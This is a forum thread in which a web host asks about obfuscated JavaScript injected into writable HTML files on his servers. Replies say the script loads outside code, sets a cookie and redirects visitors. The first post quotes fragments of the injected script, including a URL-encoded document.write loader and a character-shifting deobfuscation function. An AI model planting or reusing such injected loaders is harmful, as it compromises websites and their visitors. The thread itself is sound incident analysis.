Results 1 to 3 of 3
  1. #1

    hacked via a javascript

    So today while checking around I found this in a html source file. The first part is what was there...the second part is the script enencoded. So I did a grep for 'document.write(unescape' and found a handful of sites that back in may/June were exploited. It seems this little script wrote itself to any files on the server that it had permission. A few of my sites have safe_mode off (very few) and those that had public write permissions (666 or 777) had this added to the header. I went and cleaned it all up. I and of course I corrected any files that were public write. Does anyone know anything more about what this piece of code is suppose to do? I know an exploit exists in IE that this code I think takes use of. Luckily I don't use IE :-)

    Anyone want to take a stab at this? I bet I was exploited from phpbb before I updated. There was a week I took to do a critical update. When you have 200 sites and dozens of scripts it's hard to keep up with new updates and exploits.

    <script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C
    <script language=javascript>document.write(unescape('<script language="javascript">
    funct%69on dF(s){var s1=unescape(s%2Esubstr(0,s.length-1)); vart='';for(i=0;i<s1.length;%69++)t+=String.fromCharCode(%731.charCodeAt(i)-s.substr(s.length-1,1));document.wri%74e(unescape(t));}</script>'));

  2. #2
    Join Date
    Jun 2004
    Bay Area -USA
    I cracked it.

    It is reading a script from an external domain. It sets a cookie and then tries to redirect the user to a domain. (at least i think thats what it does - haha)

    If you want to crack it, you need to use more than javascript.write He has somethign that blocks it from outputting correctly.

    If you want more information PM me.
    Last edited by VolkNet; 07-29-2005 at 01:00 AM.
    <<< Please see Forum Guidelines for signature setup. >>>

  3. #3
    Join Date
    Jun 2004
    Bay Area -USA
    On a second look at the script that is being loaded externally - I think it tracks each page a user goes to... It's very poorly made with things like this:

    qwe = ' di'+'spl'+'ay:n'+'one'+';}</s'+'ty'+'le>';
    <<< Please see Forum Guidelines for signature setup. >>>

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts